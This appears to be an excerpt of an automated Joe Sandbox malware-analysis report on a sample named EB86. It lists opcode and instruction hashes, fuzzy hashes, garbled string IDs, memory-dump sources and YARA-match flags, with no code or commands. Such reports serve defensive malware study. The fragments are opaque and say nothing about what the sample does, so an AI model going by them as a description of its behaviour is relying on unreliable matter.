                                                                                                                                                                                                                                                  • Opcode ID: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                                                  • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction ID: ad3e51909986bf19d225fabcaab568f0f3a06181d2ac75e0ae1fb3a6de933e4f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2181E96124C3818BD719DF3984A137AFFD29FD6218F28896DF4D68B281D379C50ACB16
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction ID: 2b0d814e4e8c54bf832904666e15b804ece722a813b0ffe0c3904ebe2707db2f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C881F96124C3818BD719DF3988A137AFFD29FD6218F28896DF4D68B281D379C506CB16
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #=0$Z$ut
                                                                                                                                                                                                                                                  • API String ID: 0-1971374411
                                                                                                                                                                                                                                                  • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                                  • Instruction ID: 7a96372b25fad4524b519f99eba8cb80494cba8d57eef7dbc56d6cf47418a384
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC81133120C3828BD7098F38C55477AFFE1AF93218F1899ADD4D29B682D739C51AC752
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #=0$Z$ut
                                                                                                                                                                                                                                                  • API String ID: 0-1971374411
                                                                                                                                                                                                                                                  • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                                  • Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                                  • Instruction ID: fb46cda96982c19aa9ca075b4272b4b53cfbbef8bb0f81e0a7c936c421a97a90
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0281FB6124C3818BD719DF3988A137AFFD29FE6218F2C496DE4D18B681D339C50ACB56
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                                  • API String ID: 0-2390459867
                                                                                                                                                                                                                                                  • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                                  • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$D`a&$NMNO
                                                                                                                                                                                                                                                  • API String ID: 0-2397089600
                                                                                                                                                                                                                                                  • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                                                  • Instruction ID: 8496bcbdc018cc7f210226911d2aba05cefd326ec91261c5c59de8eff66c88e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE8145356483454FD318CF28CCA1B6BB7A2EFC5328F29C66CE5A547391DB3298098751
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$:;
                                                                                                                                                                                                                                                  • API String ID: 0-98051459
                                                                                                                                                                                                                                                  • Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                                  • Instruction ID: b723e585620fed0571dac7b57076c9cbe3139caa9afcde44a40f48c53b888cc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90A1E571A843909BDB12AF24CCD176BB3E1EF82324F198528EC958B281E375ED45CB52
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$:;
                                                                                                                                                                                                                                                  • API String ID: 0-98051459
                                                                                                                                                                                                                                                  • Opcode ID: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
                                                                                                                                                                                                                                                  • Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$NP,?
                                                                                                                                                                                                                                                  • API String ID: 0-905665905
                                                                                                                                                                                                                                                  • Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                                                  • Instruction ID: b643b3529b45a077269c0abb964e2670d9a54edebb5cd2b594fdc8825ef33d0e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10A148756843109FDB24CF28C8D1B3BB3A6EBC9728F19862DE4D957290D731A801CBD1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$NP,?
                                                                                                                                                                                                                                                  • API String ID: 0-905665905
                                                                                                                                                                                                                                                  • Opcode ID: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
                                                                                                                                                                                                                                                  • Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$_\]R
                                                                                                                                                                                                                                                  • API String ID: 0-3512975805
                                                                                                                                                                                                                                                  • Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                                                  • Instruction ID: ad03b67804417eeff9f64e800155e88e8e7f143afeb1ae474513e03929dfdddd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 649126356483518BCB18DF28C860A6FB7E2FFD9724F19852CE8C587291E731D905C786
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 8/d$_\]R
                                                                                                                                                                                                                                                  • API String ID: 2994545307-3512975805
                                                                                                                                                                                                                                                  • Opcode ID: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                                                  • Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: o~$yr
                                                                                                                                                                                                                                                  • API String ID: 0-1013308823
                                                                                                                                                                                                                                                  • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                                  • Instruction ID: 24f3d5a115f3db3729c1b8906ad960607caf898cf75328b2f7ff7f0fc012492d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 979127769483508BD320DF19C88466BF7E2EFC5314F19892CE9D94B390E7B4C506CB86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: o~$yr
                                                                                                                                                                                                                                                  • API String ID: 0-1013308823
                                                                                                                                                                                                                                                  • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                                  • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$=^"\
                                                                                                                                                                                                                                                  • API String ID: 0-215442021
                                                                                                                                                                                                                                                  • Opcode ID: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                                                  • Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: :7$%$:7$%
                                                                                                                                                                                                                                                  • API String ID: 0-2391988857
                                                                                                                                                                                                                                                  • Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                                  • Instruction ID: 5d85b922e0bb67d987acda1252dd02b6154960426b529d5a0e13ec98ade2db7a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B921B3711183908BD7089F79C964B6FFBE5BB86318F545A2DE1D287291D7B4C405CB82
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2358524386.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_EB86.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: :7$%$:7$%
                                                                                                                                                                                                                                                  • API String ID: 0-2391988857
                                                                                                                                                                                                                                                  • Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                                  • Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 8/d$
                                                                                                                                                                                                                                                  • API String ID: 0-2623845793
                                                                                                                                                                                                                                                  • Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                                  • Instruction ID: 0be8029bff5fd660166c9fbf62f4e909b56eab2fa1e023d290f8b0719cf295cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75110471368280AFD3648F64CD9677B73EAABC2324F28863CD1D8972D1DB35D4408B09
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: MO$MO
                                                                                                                                                                                                                                                  • API String ID: 0-3148518880
                                                                                                                                                                                                                                                  • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                                  • Instruction ID: 42c761b6ab6f9391aca449a77fd9c4b0a458877a476cd4d760de91f04f749cce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D119A741442918BEF148FA89D9566BBFA0EF42220F1499989C856F38BC738C511CB64
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2160000_EB86.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 7&'$$vA\
                                                                                                                                                                                                                                                  • API String ID: 0-2621209329
                                                                                                                                                                                                                                                  • Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                                  • Instruction ID: 68396cd896546055e4c74e717cd440596de8401acdf4452539e4e15a449a3a81
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3F068345545944BDB918F3D98A97BE67F0E757214F202AB5C65AE32A2C731C4818F08
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
